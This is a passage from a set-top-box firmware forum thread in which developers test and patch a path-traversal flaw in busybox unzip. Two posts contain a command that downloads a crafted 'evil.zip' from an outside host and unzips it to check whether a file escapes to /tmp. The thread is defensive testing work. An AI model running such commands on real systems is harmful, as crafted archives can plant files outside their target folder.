Jump to content


Photo

Very important - security issue


  • Please log in to reply
27 replies to this topic

Re: Very important - security issue #21 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 28 May 2017 - 19:32

Develop version, no problem.

satdreamgr-openpli 5 osmega

osmega login: root
Password:
root@osmega:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@osmega:/var/volatile/tmp#
 

Wavefield T90: 0.8W - 1.9E - 4.8E - 13E - 16E - 19.2E - 23.5E - 26E - 33E - 39E - 42E - 45E on EMP Centauri DiseqC 16/1
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916

Re: Very important - security issue #22 WanWizard

  • PLi® Core member
  • 68,303 posts

+1,718
Excellent

Posted 28 May 2017 - 19:46

I can confirm that.

 

Question is if it's worthwhile spending time on an image to be retired soon, and if so, who's going to do it?


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: Very important - security issue #23 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 28 May 2017 - 20:53

I guess that commit fix the unzip problem: https://github.com/m...abab885f1ef7680


Adding function strip_unsafe_prefix(_unzip) in unzip.c should be enough.

Will check it, if nobody else comes with a fix the next days.
Wavefield T90: 0.8W - 1.9E - 4.8E - 13E - 16E - 19.2E - 23.5E - 26E - 33E - 39E - 42E - 45E on EMP Centauri DiseqC 16/1
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916

Re: Very important - security issue #24 WanWizard

  • PLi® Core member
  • 68,303 posts

+1,718
Excellent

Posted 28 May 2017 - 22:00

Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: Very important - security issue #25 janejak

  • Senior Member
  • 284 posts

+11
Neutral

Posted 29 May 2017 - 05:12

I forget to tell my box DM900 run Newnigma2



Re: Very important - security issue #26 athoik

  • PLi® Core member
  • 8,458 posts

+327
Excellent

Posted 29 May 2017 - 15:44

Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?


Tested and works!
 
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tm
p/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********************************************************************************************************************************************************|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
Here is the PR: https://github.com/O...e-core/pull/242

Thanks @samsamsam

Edited by athoik, 29 May 2017 - 15:44.

Wavefield T90: 0.8W - 1.9E - 4.8E - 13E - 16E - 19.2E - 23.5E - 26E - 33E - 39E - 42E - 45E on EMP Centauri DiseqC 16/1
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916

Re: Very important - security issue #27 MiLo

  • PLi® Core member
  • 14,042 posts

+298
Excellent

Posted 29 May 2017 - 18:24

Cheap fix, merged it.

Security implications should be next to nothing anyway, any sane plugin that processes compressed files should use Python's built-in modules. The scenario as described in the article would never apply to OpenPLi anyway.
Real musicians never die - they just decompose

Re: Very important - security issue #28 samsamsam

  • Senior Member
  • 2,024 posts

+146
Excellent

Posted 29 May 2017 - 18:45

@MiLo

 


should use Python's built-in modules

 

 

Really? You are sure that "Python's built-in modules" are not vulnerable on this?

Second thing you suggest that it is better to block main GUI thread when extracting archive then use eConsole component?

 

I have no more questions...


Edited by samsamsam, 29 May 2017 - 18:45.



1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users